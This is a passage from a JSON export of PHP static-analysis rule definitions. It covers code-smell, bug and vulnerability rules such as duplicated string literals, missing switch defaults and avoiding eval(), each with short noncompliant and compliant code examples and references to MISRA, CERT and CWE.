<\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1185","repo":"php","name":"Overriding methods should do more than simply call the same method in the super class","htmlDesc":"<p>Overriding a method just to call the same method from the super class without performing any other actions is useless and misleading. The only time\nthis is justified is in <code>final<\/code> overriding methods, where the effect is to lock in the parent class behavior. This rule ignores such\noverrides of <code>equals<\/code>, <code>hashCode<\/code> and <code>toString<\/code>.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass Child extends Parent {\n\n public function func($n,$m) {\n parent::func($n$m); \/\/ Noncompliant\n }\n}\n\nclass Parent {\n public function func($n, $m) {\n \/\/ do something\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass Child extends Parent {\n\n public function func($n,$m) {\n parent::func($n$m);\n \/\/ do additional things...\n }\n}\n\nclass Parent {\n public function func($n, $m) {\n \/\/ do something\n }\n}\n<\/pre>\n<p>or<\/p>\n<pre>\nclass Child extends Parent {\n \/\/ function eliminated\n}\n\nclass Parent {\n public function func($n, $m) {\n \/\/ do something\n }\n}\n<\/pre>","status":"READY","tags":["rank4"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1192","repo":"php","name":"String literals should not be duplicated","htmlDesc":"<p>Duplicated string literals make the process of refactoring error-prone, since you must be sure to update all occurrences.<\/p>\n<p>On the other hand, constants can be referenced from many places, but only need to be updated in a single place.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default threshold of 3:<\/p>\n<pre>\nfunction run() {\n prepare('action1'); \/\/ Non-Compliant - 'action1' is duplicated 3 times\n execute('action1');\n release('action1');\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nACTION_1 = 'action1';\n\nfunction run() {\n prepare(ACTION_1);\n execute(ACTION_1);\n release(ACTION_1);\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>To prevent generating some false-positives, literals having less than 5 characters are excluded.<\/p>","status":"READY","tags":["rank1"],"langName":"PHP","params":[{"key":"threshold","htmlDesc":"Number of times a literal must be duplicated to trigger an issue","defaultValue":"3","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S1200","repo":"php","name":"Classes should not be coupled to too many other classes (Single Responsibility Principle)","htmlDesc":"<p>According to the Single Responsibility Principle, introduced by Robert C. Martin in his book \"Principles of Object Oriented Design\", a class should\nhave only one responsibility:<\/p>\n<blockquote>\n <p>If a class has more than one responsibility, then the responsibilities become coupled.<\/p>\n <p>Changes to one responsibility may impair or inhibit the class' ability to meet the others.<\/p>\n <p>This kind of coupling leads to fragile designs that break in unexpected ways when changed.<\/p>\n<\/blockquote>\n<p>Classes which rely on many other classes tend to aggregate too many responsibilities and should be split into several smaller ones.<\/p>\n<p>Nested classes dependencies are not counted as dependencies of the outer class.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n class Foo { \/\/ Noncompliant - Foo depends on too many classes: T1, T2, T3, T4, T5, T6 and T7\n \/**\n * @var T1\n *\/\n public $a1; \/\/ Foo is coupled to T1\n \/**\n * @var T2\n *\/\n protected $a2; \/\/ Foo is coupled to T2\n \/**\n * @var T3\n *\/\n private $a3; \/\/ Foo is coupled to T3\n\n \/**\n * @param T5\n * @param T6\n *\n * @return T4\n *\/\n public function compute(T5 $a, $b) { \/\/ Foo is coupled to T4, T5 and T6\n $result = new T7(); \/\/ Foo is coupled to T7\n return $result;\n }\n}\n<\/pre>","status":"READY","tags":["rank4"],"langName":"PHP","params":[{"key":"max","htmlDesc":"Maximum number of classes a single class is allowed to depend upon","defaultValue":"20","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S121","repo":"php","name":"Control structures should use curly braces","htmlDesc":"<p>While not technically incorrect, the omission of curly braces can be misleading, and may lead to the introduction of errors during maintenance.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n\/\/ the two statements seems to be attached to the if statement, but that is only true for the first one:\nif (condition)\n executeSomething();\n checkSomething();\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (condition) {\n executeSomething();\n checkSomething();\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 14.8 - The statement forming the body of a switch, while, do ... while or for statement shall be a compound statement <\/li>\n <li> MISRA C:2004, 14.9 - An if (expression) construct shall be followed by a compound statement. The else keyword shall be followed by either a\n compound statement, or another if statement <\/li>\n <li> MISRA C++:2008, 6-3-1 - The statement forming the body of a switch, while, do ... while or for statement shall be a compound statement <\/li>\n <li> MISRA C++:2008, 6-4-1 - An if (condition) construct shall be followed by a compound statement. The else keyword shall be followed by either a\n compound statement, or another if statement <\/li>\n <li> MISRA C:2012, 15.6 - The body of an iteration-statement or a selection-statement shall be a compound-statement <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/1QGMAg\">CERT, EXP19-C.<\/a> - Use braces for the body of an if, for, or while statement\n <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/3wHEAw\">CERT, EXP52-J.<\/a> - Use braces for the body of an if, for, or while statement\n <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S122","repo":"php","name":"Statements should be on separate lines","htmlDesc":"<p>For better readability, do not put more than one statement on a single line.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif(someCondition) doSomething();\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif(someCondition) {\n doSomething();\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Anonymous functions containing a single statement are ignored.<\/p>\n<pre>\n$max_comparator = function ($v) { return $v > 2; }; \/\/ Compliant\n$max_comparator = function ($v) { echo $v; return $v > 2; }; \/\/ Noncompliant\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S125","repo":"php","name":"Sections of code should not be \"commented out\"","htmlDesc":"<p>Programmers should not comment out code as it bloats programs and reduces readability.<\/p>\n<p>Unused code should be deleted and can be retrieved from source control history if required.<\/p>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 2.4 - Sections of code should not be \"commented out\". <\/li>\n <li> MISRA C++:2008, 2-7-2 - Sections of code shall not be \"commented out\" using C-style comments. <\/li>\n <li> MISRA C++:2008, 2-7-3 - Sections of code should not be \"commented out\" using C++ comments. <\/li>\n <li> MISRA C:2012, Dir. 4.4 - Sections of code should not be \"commented out\" <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S126","repo":"php","name":"\"if ... else if\" constructs should end with \"else\" clauses","htmlDesc":"<p>This rule applies whenever an <code>if<\/code> statement is followed by one or more <code>else if<\/code> statements; the final <code>else if<\/code>\nshould be followed by an <code>else<\/code> statement.<\/p>\n<p>The requirement for a final <code>else<\/code> statement is defensive programming.<\/p>\n<p>The <code>else<\/code> statement should either take appropriate action or contain a suitable comment as to why no action is taken. This is\nconsistent with the requirement to have a final <code>default<\/code> clause in a <code>switch<\/code> statement.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (condition1) {\n do_something();\n} else if (condition2) {\n do_something_else();\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (condition1) {\n do_something();\n} else if (condition2) {\n do_something_else();\n} else {\n throw new InvalidArgumentException('message');\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 14.10 - All if...else if constructs shall be terminated with an else clause. <\/li>\n <li> MISRA C++:2008, 6-4-2 - All if...else if constructs shall be terminated with an else clause. <\/li>\n <li> MISRA C:2012, 15.7 - All if...else if constructs shall be terminated with an else statement <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/YgE\">CERT, MSC01-C.<\/a> - Strive for logical completeness <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/JoIyAQ\">CERT, MSC01-CPP.<\/a> - Strive for logical completeness <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/PQHRAw\">CERT, MSC57-J.<\/a> - Strive for logical completeness <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1264","repo":"php","name":"A \"while\" loop should be used instead of a \"for\" loop","htmlDesc":"<p>When only the condition expression is defined in a <code>for<\/code> loop, but the init and increment expressions are missing, a <code>while<\/code>\nloop should be used instead to increase readability. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfor (;condition;) { \/*...*\/ }\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nwhile (condition) { \/*...*\/ }\n<\/pre>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S127","repo":"php","name":"\"for\" loop stop conditions should be invariant","htmlDesc":"<p>A <code>for<\/code> loop stop condition should test the loop counter against an invariant value (i.e. one that is true at both the beginning and\nending of every loop iteration). Ideally, this means that the stop condition is set to a local variable just before the loop begins. <\/p>\n<p>Stop conditions that are not invariant are slightly less efficient, as well as being difficult to understand and maintain, and likely lead to the\nintroduction of errors in the future.<\/p>\n<p>This rule tracks three types of non-invariant stop conditions:<\/p>\n<ul>\n <li> When the loop counters are updated in the body of the <code>for<\/code> loop <\/li>\n <li> When the stop condition depend upon a method call <\/li>\n <li> When the stop condition depends on an object property, since such properties could change during the execution of the loop. <\/li>\n<\/ul>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfor ($i = 0; $i < 10; $i++) {\n echo $i;\n if(condition) {\n $i = 20;\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfor ($i = 0; $i < 10; $i++) {\n echo $i;\n}\n\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 13.6 - Numeric variables being used within a <em>for<\/em> loop for iteration counting shall not be modified in the body of the\n loop. <\/li>\n <li> MISRA C++:2008, 6-5-3 - The <em>loop-counter<\/em> shall not be modified within <em>condition<\/em> or <em>statement<\/em>. <\/li>\n<\/ul>","status":"READY","tags":["rank4"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S128","repo":"php","name":"Switch cases should end with an unconditional \"break\" statement","htmlDesc":"<p>When the execution is not explicitly terminated at the end of a switch case, it continues to execute the statements of the following case. While\nthis is sometimes intentional, it often is a mistake which leads to unexpected behavior. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nswitch ($myVariable) {\n case 1:\n foo();\n break;\n case 2: \/\/ Both 'doSomething()' and 'doSomethingElse()' will be executed. Is it on purpose ?\n do_something();\n default:\n do_something_else();\n break;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nswitch ($myVariable) {\n case 1:\n foo();\n break;\n case 2:\n do_something();\n break;\n default:\n do_something_else();\n break;\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>This rule is relaxed in following cases:<\/p>\n<pre>\nswitch ($myVariable) {\n case 0: \/\/ Empty case used to specify the same behavior for a group of cases.\n case 1:\n do_something();\n break;\n case 2: \/\/ Use of continue statement\n continue;\n case 3: \/\/ Case includes a jump statement (exit, return, break &etc)\n exit(0);\n case 4:\n echo 'Second case, which falls through';\n \/\/ no break <- comment is used when fall-through is intentional in a non-empty case body\n default: \/\/ For the last case, use of break statement is optional\n doSomethingElse();\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 15.0 - The MISRA C <em>switch<\/em> syntax shall be used. <\/li>\n <li> MISRA C:2004, 15.2 - An unconditional break statement shall terminate every non-empty switch clause <\/li>\n <li> MISRA C++:2008, 6-4-3 - A switch statement shall be a well-formed switch statement. <\/li>\n <li> MISRA C++:2008, 6-4-5 - An unconditional throw or break statement shall terminate every non-empty switch-clause <\/li>\n <li> MISRA C:2012, 16.1 - All switch statements shall be well-formed <\/li>\n <li> MISRA C:2012, 16.3 - An unconditional break statement shall terminate every switch-clause <\/li>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/484.html\">MITRE, CWE-484<\/a> - Omitted Break Statement in Switch <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/YIFLAQ\">CERT, MSC17-C.<\/a> - Finish every set of statements associated with a case\n label with a break statement <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/ZoFLAQ\">CERT, MSC18-CPP.<\/a> - Finish every set of statements associated with a case\n label with a break statement <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/ewHAAQ\">CERT, MSC52-J.<\/a> - Finish every set of statements associated with a case\n label with a break statement <\/li>\n<\/ul>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1301","repo":"php","name":"\"switch\" statements should have at least 3 \"case\" clauses","htmlDesc":"<p><code>switch<\/code> statements are useful when there are many different cases depending on the value of the same expression.<\/p>\n<p>For just one or two cases however, the code will be more readable with <code>if<\/code> statements.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nswitch ($variable) {\n case 0:\n do_something();\n break;\n default:\n do_something_else();\n break;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif ($variable == 0) {\n do_something();\n} else {\n do_something_else();\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 15.5 - Every switch statement shall have at least one case clause. <\/li>\n <li> MISRA C++:2008, 6-4-8 - Every switch statement shall have at least one case-clause. <\/li>\n <li> MISRA C:2012, 16.6 - Every switch statement shall have at least two switch-clauses <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S131","repo":"php","name":"Statements should end with a \"case default\" clause","htmlDesc":"<p>The requirement for a final <code>case default<\/code> clause is defensive programming. The clause should either take appropriate action, or contain\na suitable comment as to why no action is taken. Even when the <code>switch<\/code> covers all current values of an <code>enum<\/code>, a default case\nshould still be used because there is no guarantee that the <code>enum<\/code> won't be extended.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nswitch ($param) { \/\/missing default clause\n case 0:\n do_something();\n break;\n case 1:\n do_something_else();\n break;\n}\n\nswitch ($param) {\n default: \/\/ default clause should be the last one\n error();\n break;\n case 0:\n do_something();\n break;\n case 1:\n do_something_else();\n break;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nswitch ($param) {\n case 0:\n do_something();\n break;\n case 1:\n do_something_else();\n break;\n default:\n error();\n break;\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 15.0 - The MISRA C <em>switch<\/em> syntax shall be used. <\/li>\n <li> MISRA C:2004, 15.3 - The final clause of a switch statement shall be the default clause <\/li>\n <li> MISRA C++:2008, 6-4-3 - A switch statement shall be a well-formed switch statement. <\/li>\n <li> MISRA C++:2008, 6-4-6 - The final clause of a switch statement shall be the default-clause <\/li>\n <li> MISRA C:2012, 16.1 - All switch statements shall be well-formed <\/li>\n <li> MISRA C:2012, 16.4 - Every <em>switch<\/em> statement shall have a <em>default<\/em> label <\/li>\n <li> MISRA C:2012, 16.5 - A <em>default<\/em> label shall appear as either the first or the last <em>switch label<\/em> of a <em>switch<\/em> statement\n <\/li>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/478.html\">MITRE, CWE-478<\/a> - Missing Default Case in Switch Statement <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/YgE\">CERT, MSC01-C.<\/a> - Strive for logical completeness <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/JoIyAQ\">CERT, MSC01-CPP.<\/a> - Strive for logical completeness <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S134","repo":"php","name":"Control flow statements \"if\", \"for\", \"while\", \"switch\" and \"try\" should not be nested too deeply","htmlDesc":"<p>Nested <code>if<\/code>, <code>for<\/code>, <code>while<\/code>, <code>switch<\/code>, and <code>try<\/code> statements is a key ingredient for making\nwhat's known as \"Spaghetti code\".<\/p>\n<p>Such code is hard to read, refactor and therefore maintain.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default threshold of 3:<\/p>\n<pre>\n if (condition1) { \/\/ Compliant - depth = 1\n ...\n if (condition2) { \/\/ Compliant - depth = 2\n ...\n for($ = 0; $i < 10; $i++) { \/\/ Compliant - depth = 3, not exceeding the limit\n ...\n if (condition4) { \/\/ Non-Compliant - depth = 4\n if (condition5) { \/\/ Depth = 5, exceeding the limit, but issues are only reported on depth = 4\n ...\n }\n return;\n }\n }\n }\n }\n<\/pre>","status":"READY","tags":["rank5"],"langName":"PHP","params":[{"key":"max","htmlDesc":"Maximum allowed control flow statement nesting depth.","defaultValue":"4","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S138","repo":"php","name":"Functions should not have too many lines","htmlDesc":"<p>A function that grows too large tends to aggregate too many responsibilities.<\/p>\n<p>Such functions inevitably become harder to understand and therefore harder to maintain. <\/p>\n<p>Above a specific threshold, it is strongly advised to refactor into smaller functions which focus on well-defined tasks.<\/p>\n<p>Those smaller functions will not only be easier to understand, but also probably easier to test.<\/p>","status":"READY","tags":["rank3"],"langName":"PHP","params":[{"key":"max","htmlDesc":"Maximum authorized lines in a function","defaultValue":"150","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S139","repo":"php","name":"Comments should not be located at the end of lines of code","htmlDesc":"<p>This rule verifies that single-line comments are not located at the ends of lines of code. The main idea behind this rule is that in order to be\nreally readable, trailing comments would have to be properly written and formatted (correct alignment, no interference with the visual structure of\nthe code, not too long to be visible) but most often, automatic code formatters would not handle this correctly: the code would end up less readable.\nComments are far better placed on the previous empty line of code, where they will always be visible and properly formatted.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$a = $b + $c; \/\/ This is a trailing comment that can be very very long\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n\/\/ This very long comment is better placed before the line of code\n$a = $b + $c;\n<\/pre>","status":"READY","tags":["rank4"],"langName":"PHP","params":[{"key":"legalTrailingCommentPattern","htmlDesc":"Pattern for text of trailing comments that are allowed. By default, comments containing only one word.","defaultValue":"^(\/\/|#)\\s*+[^\\s]++$","type":"STRING"}],"type":"CODE_SMELL"},{"key":"php:S1479","repo":"php","name":"\"switch\" statements should not have too many \"case\" clauses","htmlDesc":"<p>When <code>switch<\/code> statements have large sets of <code>case<\/code> clauses, it is usually an attempt to map two sets of data. A real map\nstructure would be more readable and maintainable, and should be used instead.<\/p>","status":"READY","tags":["rank5"],"langName":"PHP","params":[{"key":"max","htmlDesc":"Maximum number of case","defaultValue":"30","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S1481","repo":"php","name":"Unused local variables should be removed","htmlDesc":"<p>If a local variable is declared but not used, it is dead code and should be removed. Doing so will improve maintainability because developers will\nnot wonder what the variable is used for.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction numberOfMinutes($hours) {\n $seconds = 0; \/\/ seconds is never used\n return hours * 60;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction numberOfMinutes($hours) {\n return hours * 60;\n}\n<\/pre>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1488","repo":"php","name":"Local Variables should not be declared and then immediately returned or thrown","htmlDesc":"<p>Declaring a variable only to immediately return or throw it is a bad practice.<\/p>\n<p>Some developers argue that the practice improves code readability, because it enables them to explicitly name what is being returned. However, this\nvariable is an internal implementation detail that is not exposed to the callers of the method. The method name should be sufficient for callers to\nknow exactly what will be returned.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction compute_duration_in_milliseconds() {\n $duration = ((($hours * 60) + $minutes) * 60 + $seconds ) * 1000 ;\n return $duration;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction compute_duration_in_milliseconds() {\n return ((($hours * 60) + $minutes) * 60 + $seconds ) * 1000;\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1523","repo":"php","name":"Code should not be dynamically injected and executed","htmlDesc":"<p>The <code>eval<\/code> function is a way to run arbitrary code at run-time. <\/p>\n<p>According to the PHP documentation<\/p>\n<blockquote>\n <p>The eval() language construct is very dangerous because it allows execution of arbitrary PHP code. Its use thus is discouraged. If you have\n carefully verified that there is no other option than to use this construct, pay special attention not to pass any user provided data into it\n without properly validating it beforehand.<\/p>\n<\/blockquote>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\neval($code_to_be_dynamically_executed)\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/95.html\">MITRE CWE-95<\/a> - CWE-95: Improper Neutralization of Directives in Dynamically\n Evaluated Code ('Eval Injection') <\/li>\n <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A3-Cross-Site_Scripting_(XSS)\">OWASP Top Ten 2013 Category A3<\/a> - Cross-Site Scripting\n (XSS) <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"VULNERABILITY"},{"key":"php:S1536","repo":"php","name":"Function argument names should be unique","htmlDesc":"<p>Function arguments should all have different names to prevent any ambiguity. Indeed, if arguments have the same name, the last duplicated argument\nhides all the previous arguments with the same name. This hiding makes no sense, reduces understandability and maintainability, and obviously can be\nerror prone. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction compute($a, $a, $c) { \/\/ Noncompliant\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction compute($a, $b, $c) { \/\/ Compliant\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1599","repo":"php","name":"Variable variables should not be used","htmlDesc":"<p>PHP's \"variable variables\" feature (dynamically-named variables) is temptingly powerful, but can lead to unmaintainable code. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$var = 'foo';\n$$var = 'bar'; \/\/Noncompliant\n$$$var = 'hello'; \/\/Noncompliant\n\necho $foo; \/\/will display 'bar'\necho $bar; \/\/will display 'hello'\n<\/pre>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1600","repo":"php","name":"Deprecated predefined variables should not be used","htmlDesc":"<p>The following predefined variables are deprecated and should be replaced by the new versions:<\/p>\n<table>\n <tbody>\n <tr>\n <th>Replace<\/th>\n <th>With<\/th>\n <\/tr>\n <tr>\n <td>$HTTP_SERVER_VARS<\/td>\n <td>$_SERVER<\/td>\n <\/tr>\n <tr>\n <td>$HTTP_GET_VARS<\/td>\n <td>$_GET<\/td>\n <\/tr>\n <tr>\n <td>$HTTP_POST_VARS<\/td>\n <td>$_POST<\/td>\n <\/tr>\n <tr>\n <td>$HTTP_POST_FILES<\/td>\n <td>$_FILES<\/td>\n <\/tr>\n <tr>\n <td>$HTTP_SESSION_VARS<\/td>\n <td>$_SESSION<\/td>\n <\/tr>\n <tr>\n <td>$HTTP_ENV_VARS<\/td>\n <td>$_ENV<\/td>\n <\/tr>\n <tr>\n <td>$HTTP_COOKIE_VARS<\/td>\n <\/tr>\n <\/tbody>\n<\/table>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\necho 'Name parameter value: ' . $HTTP_GET_VARS[\"name\"];\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\necho 'Name parameter value: ' . $_GET[\"name\"];\n<\/pre>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1603","repo":"php","name":"PHP 4 constructor declarations should not be used","htmlDesc":"<p>In PHP 4, any function with the same name as the nesting class was considered a class constructor. In PHP 5, this mechanism has been deprecated and\nthe \"__construct\" method name should be used instead. If both styles are present in the same class, PHP 5 will treat the function named \"__construct\"\nas the class constructor. <\/p>\n<p>This rule rule raises an issue for each method with the same name as the enclosing class.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass Foo {\n function Foo(){...}\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass Foo {\n function __construct(){...}\n}\n<\/pre>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1605","repo":"php","name":"\"__construct\" functions should not make PHP 4-style calls to parent constructors","htmlDesc":"<p>In PHP 5 both the way to declare a constructor and the way to make a call to a parent constructor have evolved. When declaring constructors with\nthe PHP5 <code>__construct<\/code> name, nested calls to parent constructors should also use the new <code>__constructor<\/code> name.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass Foo extends Bar {\n function __construct() {\n parent::Bar();\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass Foo extends Bar {\n function __construct() {\n parent::__construct();\n }\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1656","repo":"php","name":"Variables should not be self-assigned","htmlDesc":"<p>There is no reason to re-assign a variable to itself. Either this statement is redundant and should be removed, or the re-assignment is a mistake\nand some other value or variable was intended for the assignment instead.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\npublic function setName($name) {\n $name = $name;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\npublic function setName($name) {\n $this->name = $name;\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C.<\/a> - Detect and remove code that has no effect or is never\n executed <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1757","repo":"php","name":"\"<?php\" and \"<?=\" tags should be used","htmlDesc":"<p>Coding conventions allow teams to collaborate effectively. For maximum standardization and readability, PHP code should use the long <code><?php\n?><\/code> tags or the short-echo <code><?= ?><\/code> tags; it should not use the other tag variations.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n<?\n$foo = 1;\n?>\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n<?php\n$foo = 1;\n?>\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1763","repo":"php","name":"Jump statements should not be followed by other statements","htmlDesc":"<p>Jump statements (<code>return<\/code>, <code>break<\/code>, <code>continue<\/code>, and <code>goto<\/code>) and <code>throw<\/code> expressions move\ncontrol flow out of the current code block. Typically, any statements in a block that come after a jump or <code>throw<\/code> are simply wasted\nkeystrokes lying in wait to confuse the unwary. <\/p>\n<p>Rarely, as illustrated below, code after a jump or <code>throw<\/code> is reachable. However, such code is difficult to understand, and should be\nrefactored. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction fun($a) {\n $i = 10;\n return $i + $a;\n $i++; \/\/ this is never executed\n}\n\nfunction foo($a) {\n if ($a == 5) {\n goto error;\n } else {\n \/\/ do the job\n }\n return;\n\n error:\n printf(\"don't use 5\"); \/\/ this is reachable but unreadable\n\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction fun($a) {\n $i = 10;\n return $i + $a;\n}\n\nfunction foo($a) {\n if ($a == 5) {\n handleError();\n } else {\n \/\/ do the job\n }\n return;\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C++:2008, 0-1-9 - There shall be no dead code <\/li>\n <li> MISRA C:2012, 2.2 - There shall be no dead code <\/li>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/561.html\">MITRE, CWE-561<\/a> - Dead Code <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C.<\/a> - Detect and remove code that has no effect or is never\n executed <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/OYIyAQ\">CERT, MSC07-CPP.<\/a> - Detect and remove dead code <\/li>\n<\/ul>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1764","repo":"php","name":"Identical expressions should not be used on both sides of a binary operator","htmlDesc":"<p>Using the same value on either side of a binary operator is almost always a mistake. In the case of logical operators, it is either a copy\/paste\nerror and therefore a bug, or it is simply wasted code, and should be simplified. In the case of bitwise operators and most binary mathematical\noperators, having the same value on both sides of an operator yields predictable results, and should be simplified.<\/p>\n<p>This rule ignores <code>*<\/code>, <code>+<\/code>, and <code>=<\/code>. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif ( $a == $a ) { \/\/ always true\n doZ();\n}\nif ( $a != $a ) { \/\/ always false\n doY();\n}\nif ( $a == $b && $a == $b ) { \/\/ if the first one is true, the second one is too\n doX();\n}\nif ( $a == $b || $a == $b ) { \/\/ if the first one is true, the second one is too\n doW();\n}\n\n$j = 5 \/ 5; \/\/always 1\n$k = 5 - 5; \/\/always 0\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Left-shifting 1 onto 1 is common in the construction of bit masks, and is ignored.<\/p>\n<pre>\n$i = 1 << 1; \/\/ Compliant\n$j = $a << $a; \/\/ 